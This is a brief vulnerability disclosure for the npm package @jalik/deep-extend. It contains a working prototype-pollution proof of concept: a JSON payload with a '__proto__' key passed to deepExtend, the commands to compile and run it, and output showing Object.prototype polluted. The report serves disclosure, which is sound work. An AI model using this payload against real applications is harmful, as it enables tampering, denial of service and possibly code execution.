Prototype Pollution in jalik/js-deep-extend

Reported on May 18th 2021

✍️ Description

Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as proto, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain.

🕵️‍♂️ Proof of Concept

Create the following typescript file poc.ts:

// poc.ts
import deepExtend from "@jalik/deep-extend";
console.log('Before: ' + {}.polluted)
deepExtend({}, JSON.parse('{"__proto__": {"polluted": "It\'s polluted!"}}'))
console.log('After: ' + {}.polluted)

Compile it using tsc (npm install -g typescript)

tsc poc.ts

Then a corresponding poc.js file is created by the compiler. Use node to run the js file & check the output.

node poc.js


Before: undefined
After: It's polluted!

💥 Impact

Prototype Pollution leads to Information Disclosure/DoS/RCE.